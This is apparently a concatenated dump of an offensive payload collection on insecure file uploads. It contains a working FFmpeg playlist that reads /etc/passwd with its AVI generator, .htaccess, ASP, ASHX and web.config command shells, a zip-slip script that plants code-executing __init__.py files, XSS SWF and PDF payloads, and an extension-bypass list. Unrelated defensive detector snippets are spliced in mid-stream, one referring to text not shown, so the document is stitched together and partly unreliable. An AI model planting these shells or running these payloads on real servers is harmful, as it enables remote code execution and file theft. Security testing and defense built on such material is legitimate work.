#EXTINF:1.0 19 | GOD.txt 20 | #EXTINF:1.0 21 | /etc/passwd 22 | #EXT-X-ENDLIST 23 | ``` 24 | To process a playlist ffmpeg concatenates all segments and processes it as single file. 25 | To determine the type of this file FFmpeg uses the first segment of the playlist. 26 | FFmpeg processes .txt files in a special way. It tries to show a screen capture of a tty printing this file. 
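Going back to the Tabnabbing README above: the "How to hunt for it" section describes the link pattern to look for, and the same check is what a defender runs over their own templates or crawled pages. The following Python is an added example, not code from the repository or from the Burp extension it lists; it uses only the standard-library `html.parser` and reports every `<a target="_blank">` whose `rel` carries neither `noopener` nor `noreferrer`. The sample markup is constructed for the example.

```python
from html.parser import HTMLParser


class _LinkAuditor(HTMLParser):
    """Collects <a> tags that open a new browsing context without severing window.opener."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag != "a":
            return
        # html.parser lowercases attribute names; values keep their case and may be None.
        attrs = {name.lower(): (value or "") for name, value in attrs}
        if attrs.get("target", "").lower() != "_blank":
            return
        rel_tokens = {token.lower() for token in attrs.get("rel", "").split()}
        # "noopener" nulls window.opener in the new tab; "noreferrer" implies noopener.
        if rel_tokens & {"noopener", "noreferrer"}:
            return
        self.findings.append(attrs.get("href", ""))


def find_tabnabbing_links(html):
    """Return the hrefs of links that a linked page could use to rewrite the opener tab."""
    auditor = _LinkAuditor()
    auditor.feed(html)
    auditor.close()
    return auditor.findings


# Constructed sample: a page mixing safe links and one user-supplied link.
SAMPLE_HTML = """
<p>Forum post by a user:</p>
<a href="https://example.org/safe" target="_blank" rel="noopener noreferrer">safe</a>
<a href="https://example.org/also-safe" target="_blank" rel="noreferrer">also safe</a>
<a href="https://user-supplied.example/page" target="_blank">user link</a>
<a href="https://example.org/same-tab">same tab</a>
"""

if __name__ == "__main__":
    for href in find_tabnabbing_links(SAMPLE_HTML):
        print("missing rel=noopener:", href)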
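Before handing an upload to FFmpeg, a video service can check whether an "AVI" actually carries an HLS playlist in the way the paragraph above describes. The following Python is an added example, not code from the repository or from neex's script: it walks the RIFF chunk tree, reports any non-list chunk whose body contains the `#EXTM3U` signature, and notes whether that body starts with the `GAB2` marker. The sample AVI is constructed inline with the same `movi`/`00tx`/`GAB2` layout the generator uses; it is not a real video file.

```python
import struct


def _chunk(cid, body):
    """Encode one RIFF chunk: 4-byte id, little-endian size, body, pad to even length."""
    return cid + struct.pack("<I", len(body)) + body + (b"\x00" if len(body) & 1 else b"")


def _iter_chunks(data, start, end):
    """Yield (id, body_start, body_end) for the chunks between start and end."""
    pos = start
    while pos + 8 <= end:
        cid = data[pos:pos + 4]
        size = struct.unpack("<I", data[pos + 4:pos + 8])[0]
        body_start = pos + 8
        body_end = min(body_start + size, end)  # tolerate truncated or lying sizes
        yield cid, body_start, body_end
        pos = body_end + (size & 1)


def find_hls_playlists(avi):
    """Report every chunk whose body carries an HLS playlist header, with its RIFF path."""
    findings = []

    def walk(start, end, path):
        for cid, bs, be in _iter_chunks(avi, start, end):
            name = cid.decode("latin-1")
            if cid in (b"RIFF", b"LIST"):
                # Container chunks carry a 4-byte list type, then nested chunks.
                list_type = avi[bs:bs + 4].decode("latin-1")
                walk(bs + 4, be, path + [name + ":" + list_type])
            else:
                body = avi[bs:be]
                if b"#EXTM3U" in body:
                    findings.append({
                        "path": "/".join(path + [name]),
                        "gab2": body.startswith(b"GAB2"),
                        "offset": bs + body.index(b"#EXTM3U"),
                    })

    walk(0, len(avi), [])
    if not findings and b"#EXTM3U" in avi:
        # Structure did not parse (e.g. deliberately broken sizes) but the signature is present.
        findings.append({"path": "<unparsed>", "gab2": False, "offset": avi.index(b"#EXTM3U")})
    return findings


# The playlist from the README, used only as test data.
PLAYLIST = (b"#EXTM3U\n#EXT-X-MEDIA-SEQUENCE:0\n#EXTINF:1.0\nGOD.txt\n"
            b"#EXTINF:1.0\n/etc/passwd\n#EXT-X-ENDLIST\n")


def build_sample(payload):
    """Constructed minimal AVI-shaped file: RIFF/AVI -> LIST/movi -> one '00tx' GAB2 packet."""
    text_packet = _chunk(b"00tx", b"GAB2\x00\x02\x00" + b"\x00" * 10 + payload)
    riff_body = b"AVI " + _chunk(b"LIST", b"movi" + text_packet)
    return b"RIFF" + struct.pack("<I", len(riff_body)) + riff_body


MALICIOUS_AVI = build_sample(PLAYLIST)
BENIGN_AVI = build_sample(b"just a subtitle line\n")

if __name__ == "__main__":
    print(find_hls_playlists(MALICIOUS_AVI))  # one finding under RIFF:AVI /LIST:movi/00tx
    print(find_hls_playlists(BENIGN_AVI))     # []
```

A signature scan like this is a cheap first gate, not a replacement for running the converter with a restrictive `-protocol_whitelist` and inside a sandbox that has no access to files worth disclosing.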

So, the playlist above will be processed as follows:
FFmpeg sees the #EXTM3U signature inside the GAB2 chunk and determines the file type as HLS playlist.
The file GOD.txt doesn't even exist, but its name is enough for FFmpeg to detect the file type as .txt.
FFmpeg concatenates the contents of all segments of the playlist. As only one of the two segments actually exists, the result of the concatenation is just the contents of the file we want to retrieve.
Because the type of this concatenation is .txt, FFmpeg draws a tty that prints the file.

## Thanks to
* [Hackerone - Local File Disclosure via ffmpeg @sxcurity](https://hackerone.com/reports/242831)
* [Hackerone - Another local file disclosure via ffmpeg](https://hackerone.com/reports/243470)
* [PHDays - Attacks on video converters: a year later, Emil Lerner, Pavel Cheremushkin](https://docs.google.com/presentation/d/1yqWy_aE3dQNXAhW8kxMxRqtP7qMHaIfMzUDpEqFneos/edit#slide=id.p)
* [Script by @neex](https://github.com/neex/ffmpeg-avi-m3u-xbin/blob/master/gen_xbin_avi.py)
--------------------------------------------------------------------------------
/Upload Insecure Files/CVE Ffmpeg HLS/gen_avi_bypass.py:
--------------------------------------------------------------------------------
import struct
import argparse

AVI_HEADER = b"RIFF\x00\x00\x00\x00AVI 
LIST\x14\x01\x00\x00hdrlavih8\x00\x00\x00@\x9c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00}\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\xe0\x00\x00\x00\xa0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00LISTt\x00\x00\x00strlstrh8\x00\x00\x00txts\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x19\x00\x00\x00\x00\x00\x00\x00}\x00\x00\x00\x86\x03\x00\x00\x10'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xe0\x00\xa0\x00strf(\x00\x00\x00(\x00\x00\x00\xe0\x00\x00\x00\xa0\x00\x00\x00\x01\x00\x18\x00XVID\x00H\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00LIST movi" 5 | 6 | 7 | def make_txt_packet(content, fake_packets=50, fake_packet_len=200): 8 | content = b'GAB2\x00\x02\x00' + b'\x00' * 10 + content 9 | packet = b'00tx' + struct.pack(' 6 | Order allow,deny 7 | Allow from all 8 | 9 | 10 | # Make .htaccess file be interpreted as php file. This occur after apache has interpreted 11 | # the apache directoves from the .htaccess file 12 | AddType application/x-httpd-php .htaccess 13 | 14 | ###### SHELL ###### &1"); ?>###### LLEHS ###### 15 | -------------------------------------------------------------------------------- /Upload Insecure Files/Configuration Apache .htaccess/.htaccess_phpinfo: -------------------------------------------------------------------------------- 1 | AddType application/x-httpd-php .htaccess 2 | # 3 | SetHandler server-status 4 | SetHandler server-info 5 | 6 | -------------------------------------------------------------------------------- /Upload Insecure Files/Configuration Apache .htaccess/.htaccess_shell: -------------------------------------------------------------------------------- 1 | # htaccess backdoor shell 2 | # this is relatively stealthy compared to a typical webshell 3 | 4 | # overriding deny rule 5 | # making htaccess accessible from the internet 6 | # without this you'll get a HTTP 403 7 | 8 | Require all granted 9 | Order 
allow,deny
Allow from all

# Make the server treat .htaccess file as .php file
AddType application/x-httpd-php .htaccess

#

# To execute commands you would navigate to:
# http://vulnerable.com/.htaccess?cmd=YourCommand

# If system(); isn't working then try other syscalls
# e.g. passthru(); shell_exec(); etc
# If you still can't execute syscalls, try bypassing php.ini via htaccess
--------------------------------------------------------------------------------
/Upload Insecure Files/Configuration Apache .htaccess/README.md:
--------------------------------------------------------------------------------
# .htaccess upload

Uploading an .htaccess file to override Apache rules and execute PHP.
"Hackers can also use “.htaccess” file tricks to upload a malicious file with any extension and execute it. For a simple example, imagine uploading to the vulnerable server an .htaccess file that has AddType application/x-httpd-php .htaccess configuration and also contains PHP shellcode. Because of the malicious .htaccess file, the web server considers the .htaccess file as an executable php file and executes its malicious PHP shellcode. One thing to note: .htaccess configurations are applicable only for the same directory and sub-directories where the .htaccess file is uploaded."

Self contained .htaccess web shell

```apache
# Self contained .htaccess web shell - Part of the htshell project
# Written by Wireghoul - http://www.justanotherhacker.com

# Override default deny rule to make .htaccess file accessible over web

Order allow,deny
Allow from all

# Make .htaccess file be interpreted as php file. This occurs after apache has interpreted
# the apache directives from the .htaccess file
AddType application/x-httpd-php .htaccess
```

```php
###### SHELL ######
&1"); ?>
```

# .htaccess upload as image

If the `exif_imagetype` function is used on the server side to determine the image type, create a `.htaccess/image` polyglot.

[Supported image types](http://php.net/manual/en/function.exif-imagetype.php#refsect1-function.exif-imagetype-constants) include [X BitMap (XBM)](https://en.wikipedia.org/wiki/X_BitMap) and [WBMP](https://en.wikipedia.org/wiki/Wireless_Application_Protocol_Bitmap_Format). Since `.htaccess` ignores lines starting with `\x00` and `#`, you can use these scripts to generate a valid `.htaccess/image` polyglot.

```python
# create valid .htaccess/xbm image

width = 50
height = 50
payload = '# .htaccess file'

with open('.htaccess', 'w') as htaccess:
    htaccess.write('#define test_width %d\n' % (width, ))
    htaccess.write('#define test_height %d\n' % (height, ))
    htaccess.write(payload)
```
or
```python
# create valid .htaccess/wbmp image

type_header = b'\x00'
fixed_header = b'\x00'
width = b'50'
height = b'50'
payload = b'# .htaccess file'

with open('.htaccess', 'wb') as htaccess:
    htaccess.write(type_header + fixed_header + width + height)
    htaccess.write(b'\n')
    htaccess.write(payload)
```

## Thanks to

* [ATTACKING WEBSERVERS VIA .HTACCESS - By Eldar Marcussen](http://www.justanotherhacker.com/2011/05/htaccess-based-attacks.html)
* [Protection from Unrestricted File Upload Vulnerability](https://blog.qualys.com/securitylabs/2015/10/22/unrestricted-file-upload-vulnerability)
* [Writeup to l33t-hoster task, Insomnihack Teaser 2019](http://corb3nik.github.io/blog/insomnihack-teaser-2019/l33t-hoster)

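The polyglot section above makes the defender's point: an image-signature check such as `exif_imagetype` says nothing about what else a file contains, so the upload handler has to reject on name and content as well. The following Python is an added example, not code from the repository or from the linked writeups; the directive list and the reason strings are choices made for this example, and the sample files are constructed inline (the polyglot is what the XBM script above writes, with the `AddType` line from the web shell appended).

```python
import re

# Directives an uploaded .htaccess could use to change how Apache serves a directory.
# Assumption: this list is illustrative for the example, not an exhaustive catalogue.
_DIRECTIVE_RE = re.compile(
    rb"^[ \t]*(AddType|AddHandler|SetHandler|ForceType|php_value|php_flag|"
    rb"Options|Require|Order|Allow|Deny|RewriteEngine|RewriteRule|Redirect)\b",
    re.IGNORECASE | re.MULTILINE,
)


def looks_like_xbm(data):
    """The signature test the polyglot is built to pass: an XBM file begins with a #define line."""
    return data.startswith(b"#define ")


def upload_rejections(filename, data):
    """Return the reasons to refuse an upload even when the image-signature check passes.

    An empty list means the file is acceptable by these rules.
    """
    reasons = []
    base = filename.replace("\\", "/").rsplit("/", 1)[-1]
    if base.startswith("."):
        reasons.append("hidden/dotfile name")
    if base.lower().startswith(".ht"):
        reasons.append("name reserved by Apache (.ht*)")
    if _DIRECTIVE_RE.search(data):
        reasons.append("contains Apache configuration directives")
    return reasons


# Constructed: output of the XBM script above plus the AddType line from the web shell.
XBM_POLYGLOT = (b"#define test_width 50\n#define test_height 50\n"
                b"# .htaccess file\nAddType application/x-httpd-php .htaccess\n")
# Constructed: a genuine 8x1 XBM image.
CLEAN_XBM = (b"#define test_width 8\n#define test_height 1\n"
             b"static char test_bits[] = { 0xff };\n")

if __name__ == "__main__":
    for name, data in ((".htaccess", XBM_POLYGLOT), ("avatar.xbm", XBM_POLYGLOT), ("avatar.xbm", CLEAN_XBM)):
        print(name, "xbm-signature-ok" if looks_like_xbm(data) else "not-xbm", upload_rejections(name, data))
```

The content scan is a second line; the first is server configuration: `AllowOverride None` on the upload directory makes Apache ignore any `.htaccess` that lands there, and storing uploads outside the document root with a fixed, server-chosen filename removes the name-based tricks entirely.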
--------------------------------------------------------------------------------
/Upload Insecure Files/Configuration Busybox httpd.conf/README.md:
--------------------------------------------------------------------------------
If you have upload access to a non /cgi-bin folder - upload a httpd.conf and configure your own interpreter.

Details from Busybox httpd.c

https://github.com/brgl/busybox/blob/abbf17abccbf832365d9acf1c280369ba7d5f8b2/networking/httpd.c#L60

> *.php:/path/php # run xxx.php through an interpreter`

> If a sub directory contains config file, it is parsed and merged with any existing settings as if it was appended to the original configuration.

Watch out for Windows CRLF line endings messing up your payload (you will just get 404 errors) - you can't see these in Burp :)
--------------------------------------------------------------------------------
/Upload Insecure Files/Configuration Busybox httpd.conf/httpd.conf:
--------------------------------------------------------------------------------
*.sh:/bin/sh
--------------------------------------------------------------------------------
/Upload Insecure Files/Configuration Busybox httpd.conf/shellymcshellface.sh:
--------------------------------------------------------------------------------
echo "Content-type: text/html"
echo ""
echo `id`
--------------------------------------------------------------------------------
/Upload Insecure Files/Configuration IIS web.config/web.config:
--------------------------------------------------------------------------------
")
Response.write("
")
Set wShell1 = CreateObject("WScript.Shell")
Set cmd1 = wShell1.Exec("whoami")
output1 = cmd1.StdOut.Readall()
set cmd1 = nothing: Set wShell1 = nothing
Response.write(output1)
Response.write("
-->
--------------------------------------------------------------------------------
/Upload Insecure Files/Configuration IIS web.config/web.web.config:
--------------------------------------------------------------------------------
--------------------------------------------------------------------------------
/Upload Insecure Files/Configuration Python __init__.py/python-admin-__init__.py.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0dayCTF/PayloadsAllTheThings/ba2c02cc3ef3f63df6351aa55509bdac137fb3b8/Upload Insecure Files/Configuration Python __init__.py/python-admin-__init__.py.zip
--------------------------------------------------------------------------------
/Upload Insecure Files/Configuration Python __init__.py/python-conf-__init__.py.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0dayCTF/PayloadsAllTheThings/ba2c02cc3ef3f63df6351aa55509bdac137fb3b8/Upload Insecure Files/Configuration Python __init__.py/python-conf-__init__.py.zip
--------------------------------------------------------------------------------
/Upload Insecure Files/Configuration Python __init__.py/python-config-__init__.py.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0dayCTF/PayloadsAllTheThings/ba2c02cc3ef3f63df6351aa55509bdac137fb3b8/Upload Insecure Files/Configuration Python __init__.py/python-config-__init__.py.zip
--------------------------------------------------------------------------------
/Upload Insecure Files/Configuration Python __init__.py/python-controllers-__init__.py.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0dayCTF/PayloadsAllTheThings/ba2c02cc3ef3f63df6351aa55509bdac137fb3b8/Upload Insecure Files/Configuration Python __init__.py/python-controllers-__init__.py.zip
--------------------------------------------------------------------------------
/Upload Insecure Files/Configuration Python __init__.py/python-generate-init.py:
--------------------------------------------------------------------------------
# Generating "evil" zip file
# Based on the work of Ajin Abraham
# Vuln website : https://github.com/ajinabraham/bad_python_extract
# More info : https://ajinabraham.com/blog/exploiting-insecure-file-extraction-in-python-for-code-execution

# Warning 1: need a restart from the server OR debug=True
# Warning 2: you won't get the output of the command (blind rce)
import zipfile

directories = ["conf", "config", "settings", "utils", "urls", "view", "tests", "scripts", "controllers", "modules", "models", "admin", "login"]
for d in directories:
    name = "python-"+d+"-__init__.py.zip"
    zipf = zipfile.ZipFile(name, 'w', zipfile.ZIP_DEFLATED)
    zipf.close()
    z_info = zipfile.ZipInfo(r"../"+d+"/__init__.py")
    z_file = zipfile.ZipFile(name, mode="w") # "/home/swissky/Bureau/"+
    z_file.writestr(z_info, "import os;print 'Shell';os.system('ls');")
    z_info.external_attr = 0o777 << 16
    z_file.close()
--------------------------------------------------------------------------------
/Upload Insecure Files/Configuration Python __init__.py/python-login-__init__.py.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0dayCTF/PayloadsAllTheThings/ba2c02cc3ef3f63df6351aa55509bdac137fb3b8/Upload Insecure Files/Configuration Python __init__.py/python-login-__init__.py.zip
--------------------------------------------------------------------------------
/Upload Insecure Files/Configuration Python 
__init__.py/python-models-__init__.py.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0dayCTF/PayloadsAllTheThings/ba2c02cc3ef3f63df6351aa55509bdac137fb3b8/Upload Insecure Files/Configuration Python __init__.py/python-models-__init__.py.zip
--------------------------------------------------------------------------------
/Upload Insecure Files/Configuration Python __init__.py/python-modules-__init__.py.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0dayCTF/PayloadsAllTheThings/ba2c02cc3ef3f63df6351aa55509bdac137fb3b8/Upload Insecure Files/Configuration Python __init__.py/python-modules-__init__.py.zip
--------------------------------------------------------------------------------
/Upload Insecure Files/Configuration Python __init__.py/python-scripts-__init__.py.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0dayCTF/PayloadsAllTheThings/ba2c02cc3ef3f63df6351aa55509bdac137fb3b8/Upload Insecure Files/Configuration Python __init__.py/python-scripts-__init__.py.zip
--------------------------------------------------------------------------------
/Upload Insecure Files/Configuration Python __init__.py/python-settings-__init__.py.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0dayCTF/PayloadsAllTheThings/ba2c02cc3ef3f63df6351aa55509bdac137fb3b8/Upload Insecure Files/Configuration Python __init__.py/python-settings-__init__.py.zip
--------------------------------------------------------------------------------
/Upload Insecure Files/Configuration Python __init__.py/python-tests-__init__.py.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0dayCTF/PayloadsAllTheThings/ba2c02cc3ef3f63df6351aa55509bdac137fb3b8/Upload Insecure Files/Configuration Python __init__.py/python-tests-__init__.py.zip
--------------------------------------------------------------------------------
/Upload Insecure Files/Configuration Python __init__.py/python-urls-__init__.py.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0dayCTF/PayloadsAllTheThings/ba2c02cc3ef3f63df6351aa55509bdac137fb3b8/Upload Insecure Files/Configuration Python __init__.py/python-urls-__init__.py.zip
--------------------------------------------------------------------------------
/Upload Insecure Files/Configuration Python __init__.py/python-utils-__init__.py.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0dayCTF/PayloadsAllTheThings/ba2c02cc3ef3f63df6351aa55509bdac137fb3b8/Upload Insecure Files/Configuration Python __init__.py/python-utils-__init__.py.zip
--------------------------------------------------------------------------------
/Upload Insecure Files/Configuration Python __init__.py/python-view-__init__.py.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0dayCTF/PayloadsAllTheThings/ba2c02cc3ef3f63df6351aa55509bdac137fb3b8/Upload Insecure Files/Configuration Python __init__.py/python-view-__init__.py.zip
--------------------------------------------------------------------------------
/Upload Insecure Files/EICAR/eicar.txt:
--------------------------------------------------------------------------------
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
--------------------------------------------------------------------------------
/Upload Insecure Files/Extension ASP/shell.asa:
--------------------------------------------------------------------------------
<%
' *******************************************************************************
' ***
' *** Laudanum Project
' *** A Collection of Injectable Files used during a Penetration Test
' ***
' *** More information is available at:
' *** http://laudanum.secureideas.net
' *** laudanum@secureideas.net
' ***
' *** Project Leads:
' *** Kevin Johnson
' ***
' *** Copyright 2012 by Kevin Johnson and the Laudanum Team
' ***
' ********************************************************************************
' ***
' *** Updated and fixed by Robin Wood
' *** Updated and fixed by Tim Medin "1.2.3.4" then
response.Status="404 Page Not Found"
response.Write(response.Status)
response.End
end if

if Request.Form("submit") <> "" then
Dim wshell, intReturn, strPResult
cmd = Request.Form("cmd")
Response.Write ("Running command: " & cmd & "
")
set wshell = CreateObject("WScript.Shell")
Set objCmd = wShell.Exec(cmd)
strPResult = objCmd.StdOut.Readall()

response.write "
" & replace(replace(strPResult,"<","<"),vbCrLf,"
") & "
"

set wshell = nothing
end if

%>

Laundanum ASP Shell

Command:

Don't forget that if you want to shell command (not a specific executable) you need to call cmd.exe. It is usually located at C:\Windows\System32\cmd.exe, but to be safe just call %ComSpec%. Also, don't forget to use the /c switch so cmd.exe terminates when your command is done.

Example command to do a directory listing:
%ComSpec% /c dir

Copyright © 2012, Kevin Johnson and the Laudanum team.
Written by Tim Medin.
Get the latest version at laudanum.secureideas.net.

--------------------------------------------------------------------------------
/Upload Insecure Files/Extension ASP/shell.ashx:
--------------------------------------------------------------------------------
<% @ webhandler language="C#" class="AverageHandler" %>

using System;
using System.Web;
using System.Diagnostics;
using System.IO;

public class AverageHandler : IHttpHandler
{
  /* .Net requires this to be implemented */
  public bool IsReusable
  {
    get { return true; }
  }

  /* main executing code */
  public void ProcessRequest(HttpContext ctx)
  {
    Uri url = new Uri(HttpContext.Current.Request.Url.Scheme + "://" + HttpContext.Current.Request.Url.Authority + HttpContext.Current.Request.RawUrl);
    string command = HttpUtility.ParseQueryString(url.Query).Get("cmd");

    ctx.Response.Write("
Command:
");
    ctx.Response.Write("
");
    ctx.Response.Write("
");

    /* command execution and output retrieval */
    ProcessStartInfo psi = new ProcessStartInfo();
    psi.FileName = "cmd.exe";
    psi.Arguments = "/c "+command;
    psi.RedirectStandardOutput = true;
    psi.UseShellExecute = false;
    Process p = Process.Start(psi);
    StreamReader stmrdr = p.StandardOutput;
    string s = stmrdr.ReadToEnd();
    stmrdr.Close();

    ctx.Response.Write(System.Web.HttpUtility.HtmlEncode(s));
    ctx.Response.Write("
");
    ctx.Response.Write("
");
    ctx.Response.Write("By @Hypn, for educational purposes only.");
  }
}
--------------------------------------------------------------------------------
/Upload Insecure Files/Extension ASP/shell.asp:
--------------------------------------------------------------------------------
<%
' *******************************************************************************
' ***
' *** Laudanum Project
' *** A Collection of Injectable Files used during a Penetration Test
' ***
' *** More information is available at:
' *** http://laudanum.secureideas.net
' *** laudanum@secureideas.net
' ***
' *** Project Leads:
' *** Kevin Johnson
' ***
' *** Copyright 2012 by Kevin Johnson and the Laudanum Team
' ***
' ********************************************************************************
' ***
' *** Updated and fixed by Robin Wood
' *** Updated and fixed by Tim Medin "1.2.3.4" then
response.Status="404 Page Not Found"
response.Write(response.Status)
response.End
end if

if Request.Form("submit") <> "" then
Dim wshell, intReturn, strPResult
cmd = Request.Form("cmd")
Response.Write ("Running command: " & cmd & "
")
set wshell = CreateObject("WScript.Shell")
Set objCmd = wShell.Exec(cmd)
strPResult = objCmd.StdOut.Readall()

response.write "
" & replace(replace(strPResult,"<","<"),vbCrLf,"
") & "
"

set wshell = nothing
end if

%>

Laundanum ASP Shell

Command:

Don't forget that if you want to shell command (not a specific executable) you need to call cmd.exe. It is usually located at C:\Windows\System32\cmd.exe, but to be safe just call %ComSpec%. Also, don't forget to use the /c switch so cmd.exe terminates when your command is done.

Example command to do a directory listing:
%ComSpec% /c dir

Copyright © 2012, Kevin Johnson and the Laudanum team.
Written by Tim Medin.
Get the latest version at laudanum.secureideas.net.

--------------------------------------------------------------------------------
/Upload Insecure Files/Extension ASP/shell.xamlx:
--------------------------------------------------------------------------------
[System.Diagnostics.Process.Start("cmd.exe", "/c calc").toString()]
--------------------------------------------------------------------------------
/Upload Insecure Files/Extension Flash/README.md:
--------------------------------------------------------------------------------
### XSS via SWF

As you may already know, it is possible to make a website vulnerable to XSS if you can upload/include a SWF file into that website. I am going to present this SWF file that you can use in your PoCs.
This method is based on [1] and [2], and it has been tested in Google Chrome, Mozilla Firefox, IE9/8; there should not be any problem with other browsers either.

```powershell
Browsers other than IE: http://0me.me/demo/xss/xssproject.swf?js=alert(document.domain);

IE8: http://0me.me/demo/xss/xssproject.swf?js=try{alert(document.domain)}catch(e){ window.open(‘?js=history.go(-1)’,’_self’);}

IE9: http://0me.me/demo/xss/xssproject.swf?js=w=window.open(‘invalidfileinvalidfileinvalidfile’,’target’);setTimeout(‘alert(w.document.location);w.close();’,1);
```
--------------------------------------------------------------------------------
/Upload Insecure Files/Extension Flash/xss.swf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0dayCTF/PayloadsAllTheThings/ba2c02cc3ef3f63df6351aa55509bdac137fb3b8/Upload Insecure Files/Extension Flash/xss.swf
--------------------------------------------------------------------------------
/Upload Insecure Files/Extension Flash/xssproject.swf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0dayCTF/PayloadsAllTheThings/ba2c02cc3ef3f63df6351aa55509bdac137fb3b8/Upload Insecure Files/Extension Flash/xssproject.swf
--------------------------------------------------------------------------------
/Upload Insecure Files/Extension HTML/xss.html:
--------------------------------------------------------------------------------
--------------------------------------------------------------------------------
/Upload Insecure Files/Extension PDF JS/poc.js:
--------------------------------------------------------------------------------
app.alert("XSS")
--------------------------------------------------------------------------------
/Upload Insecure Files/Extension PDF JS/poc.py:
--------------------------------------------------------------------------------
# FROM https://github.com/osnr/horrifying-pdf-experiments
import sys

from pdfrw import PdfWriter
from pdfrw.objects.pdfname import PdfName
from pdfrw.objects.pdfstring import PdfString
from pdfrw.objects.pdfdict import PdfDict
from pdfrw.objects.pdfarray import PdfArray

def make_js_action(js):
    action = PdfDict()
    action.S = PdfName.JavaScript
    action.JS = js
    return action

def make_field(name, x, y, width, height, r, g, b, value=""):
    annot = PdfDict()
    annot.Type = PdfName.Annot
    annot.Subtype = PdfName.Widget
    annot.FT = PdfName.Tx
    annot.Ff = 2
    annot.Rect = PdfArray([x, y, x + width, y + height])
    annot.MaxLen = 160
    annot.T = PdfString.encode(name)
    annot.V = PdfString.encode(value)

    # Default appearance stream: can be arbitrary PDF XObject or
    # something. Very general.
    annot.AP = PdfDict()

    ap = annot.AP.N = PdfDict()
    ap.Type = PdfName.XObject
    ap.Subtype = PdfName.Form
    ap.FormType = 1
    ap.BBox = PdfArray([0, 0, width, height])
    ap.Matrix = PdfArray([1.0, 0.0, 0.0, 1.0, 0.0, 0.0])
    ap.stream = """
%f %f %f rg
0.0 0.0 %f %f re f
""" % (r, g, b, width, height)

    # It took me a while to figure this out. See PDF spec:
    # https://www.adobe.com/content/dam/Adobe/en/devnet/acrobat/pdfs/pdf_reference_1-7.pdf#page=641

    # Basically, the appearance stream we just specified doesn't
    # follow the field rect if it gets changed in JS (at least not in
    # Chrome).

    # But this simple MK field here, with border/color
    # characteristics, _does_ follow those movements and resizes, so
    # we can get moving colored rectangles this way.
    annot.MK = PdfDict()
    annot.MK.BG = PdfArray([r, g, b])

    return annot

def make_page(fields, script):
    page = PdfDict()
    page.Type = PdfName.Page

    page.Resources = PdfDict()
    page.Resources.Font = PdfDict()
    page.Resources.Font.F1 = PdfDict()
    page.Resources.Font.F1.Type = PdfName.Font
    page.Resources.Font.F1.Subtype = PdfName.Type1
    page.Resources.Font.F1.BaseFont = PdfName.Helvetica

    page.MediaBox = PdfArray([0, 0, 612, 792])

    page.Contents = PdfDict()
    page.Contents.stream = """
BT
/F1 24 Tf
ET
"""

    annots = fields

    page.AA = PdfDict()
    # You probably should just wrap each JS action with a try/catch,
    # because Chrome does no error reporting or even logging otherwise;
    # you just get a silent failure.
    page.AA.O = make_js_action("""
try {
%s
} catch (e) {
app.alert(e.message);
}
""" % (script))

    page.Annots = PdfArray(annots)
    return page

if len(sys.argv) > 1:
    js_file = open(sys.argv[1], 'r')

    fields = []
    for line in js_file:
        if not line.startswith('/// '): break
        pieces = line.split()
        params = [pieces[1]] + [float(token) for token in pieces[2:]]
        fields.append(make_field(*params))

    js_file.seek(0)

    out = PdfWriter()
    out.addpage(make_page(fields, js_file.read()))
    out.write('result.pdf')
--------------------------------------------------------------------------------
/Upload Insecure Files/Extension PDF JS/result.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0dayCTF/PayloadsAllTheThings/ba2c02cc3ef3f63df6351aa55509bdac137fb3b8/Upload Insecure Files/Extension PDF JS/result.pdf
--------------------------------------------------------------------------------
/Upload Insecure Files/Extension PHP/extensions.lst:
--------------------------------------------------------------------------------
.jpeg.php
.jpg.php
.png.php
.php
.php3
.php4
.php5
.php7
.pht
.phar
.phpt
.pgif
.phtml
.phtm
.php%00.gif
.php\x00.gif
.php%00.png
.php\x00.png
.php%00.jpg
.php\x00.jpg
--------------------------------------------------------------------------------
/Upload Insecure Files/Extension PHP/phpinfo.jpg.php:
--------------------------------------------------------------------------------
--------------------------------------------------------------------------------
/Upload Insecure Files/Extension PHP/phpinfo.phar:
--------------------------------------------------------------------------------
--------------------------------------------------------------------------------
/Upload Insecure Files/Extension PHP/phpinfo.php:
--------------------------------------------------------------------------------
--------------------------------------------------------------------------------
/Upload Insecure Files/Extension PHP/phpinfo.php3:
--------------------------------------------------------------------------------
--------------------------------------------------------------------------------
/Upload Insecure Files/Extension PHP/phpinfo.php4:
--------------------------------------------------------------------------------
--------------------------------------------------------------------------------
/Upload Insecure Files/Extension PHP/phpinfo.php5:
--------------------------------------------------------------------------------
--------------------------------------------------------------------------------
/Upload Insecure Files/Extension PHP/phpinfo.php7:
--------------------------------------------------------------------------------
--------------------------------------------------------------------------------
/Upload Insecure Files/Extension PHP/phpinfo.phpt:
--------------------------------------------------------------------------------
--------------------------------------------------------------------------------
/Upload Insecure Files/Extension PHP/phpinfo.pht:
--------------------------------------------------------------------------------
--------------------------------------------------------------------------------
/Upload Insecure Files/Extension PHP/phpinfo.phtml:
--------------------------------------------------------------------------------
--------------------------------------------------------------------------------
